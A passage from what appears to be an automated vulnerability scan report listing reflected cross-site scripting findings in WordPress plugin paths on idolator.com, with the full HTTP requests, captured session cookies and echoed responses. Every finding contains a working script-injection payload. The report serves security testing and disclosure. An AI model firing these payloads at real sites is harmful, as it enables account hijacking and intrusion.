Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:47 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins6cf26\"><script>alert(1)</script>ddacd7a0384/wp-facebookconnect/xd_receiver.php" />
...[SNIP]...

4.152. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22af8"><script>alert(1)</script>b845d5fbef6 was submitted in the REST URL parameter 3. This input was echoed as 22af8\"><script>alert(1)</script>b845d5fbef6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-facebookconnect22af8"><script>alert(1)</script>b845d5fbef6/xd_receiver.php HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:58 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-facebookconnect22af8\"><script>alert(1)</script>b845d5fbef6/xd_receiver.php" />
...[SNIP]...

4.153. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-facebookconnect/xd_receiver.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536a7"><script>alert(1)</script>2d1ae258ddb was submitted in the REST URL parameter 4. This input was echoed as 536a7\"><script>alert(1)</script>2d1ae258ddb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-facebookconnect/xd_receiver.php536a7"><script>alert(1)</script>2d1ae258ddb HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:34:16 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35939
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php536a7\"><script>alert(1)</script>2d1ae258ddb" />
...[SNIP]...

4.154. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 411a7"><script>alert(1)</script>8486c1597cf was submitted in the REST URL parameter 1. This input was echoed as 411a7\"><script>alert(1)</script>8486c1597cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content411a7"><script>alert(1)</script>8486c1597cf/plugins/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:32:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:32:55 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content411a7\"><script>alert(1)</script>8486c1597cf/plugins/wp-polls/polls-css.css?ver=2.50" />
...[SNIP]...

4.155. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef64c"><script>alert(1)</script>8be803bc4d3 was submitted in the REST URL parameter 2. This input was echoed as ef64c\"><script>alert(1)</script>8be803bc4d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsef64c"><script>alert(1)</script>8be803bc4d3/wp-polls/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:07 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsef64c\"><script>alert(1)</script>8be803bc4d3/wp-polls/polls-css.css?ver=2.50" />
...[SNIP]...

4.156. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eb93"><script>alert(1)</script>85680b4efea was submitted in the REST URL parameter 3. This input was echoed as 6eb93\"><script>alert(1)</script>85680b4efea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls6eb93"><script>alert(1)</script>85680b4efea/polls-css.css?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:21 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls6eb93\"><script>alert(1)</script>85680b4efea/polls-css.css?ver=2.50" />
...[SNIP]...

4.157. http://idolator.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4e8"><script>alert(1)</script>cade8732198 was submitted in the REST URL parameter 4. This input was echoed as ed4e8\"><script>alert(1)</script>cade8732198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-css.cssed4e8"><script>alert(1)</script>cade8732198?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:32 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35930
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls/polls-css.cssed4e8\"><script>alert(1)</script>cade8732198?ver=2.50" />
...[SNIP]...

4.158. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e61a3"><script>alert(1)</script>de04ee79223 was submitted in the REST URL parameter 1. This input was echoed as e61a3\"><script>alert(1)</script>de04ee79223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contente61a3"><script>alert(1)</script>de04ee79223/plugins/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:32:59 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:32:59 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contente61a3\"><script>alert(1)</script>de04ee79223/plugins/wp-polls/polls-js.js?ver=2.50" />
...[SNIP]...

4.159. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8040"><script>alert(1)</script>684a5586fea was submitted in the REST URL parameter 2. This input was echoed as d8040\"><script>alert(1)</script>684a5586fea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsd8040"><script>alert(1)</script>684a5586fea/wp-polls/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:13 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/pluginsd8040\"><script>alert(1)</script>684a5586fea/wp-polls/polls-js.js?ver=2.50" />
...[SNIP]...

4.160. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd48"><script>alert(1)</script>d9a2b5b9c97 was submitted in the REST URL parameter 3. This input was echoed as afd48\"><script>alert(1)</script>d9a2b5b9c97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-pollsafd48"><script>alert(1)</script>d9a2b5b9c97/polls-js.js?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:26 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35924
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-pollsafd48\"><script>alert(1)</script>d9a2b5b9c97/polls-js.js?ver=2.50" />
...[SNIP]...

4.161. http://idolator.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wp-polls/polls-js.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 945b8"><script>alert(1)</script>d485dfaae3 was submitted in the REST URL parameter 4. This input was echoed as 945b8\"><script>alert(1)</script>d485dfaae3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-polls/polls-js.js945b8"><script>alert(1)</script>d485dfaae3?ver=2.50 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:37 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35921
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/wp-polls/polls-js.js945b8\"><script>alert(1)</script>d485dfaae3?ver=2.50" />
...[SNIP]...

4.162. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcf7c"><script>alert(1)</script>c9f57ca000c was submitted in the REST URL parameter 1. This input was echoed as dcf7c\"><script>alert(1)</script>c9f57ca000c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentdcf7c"><script>alert(1)</script>c9f57ca000c/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:02 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contentdcf7c\"><script>alert(1)</script>c9f57ca000c/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6" />
...[SNIP]...

4.163. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /wp-content/plugins/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d4e"><script>alert(1)</script>827c3f95aec was submitted in the REST URL parameter 2. This input was echoed as 24d4e\"><script>alert(1)</script>827c3f95aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins24d4e"><script>alert(1)</script>827c3f95aec/wpaudio-mp3-player/sm2/soundmanager2-nodebug-jsmin.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
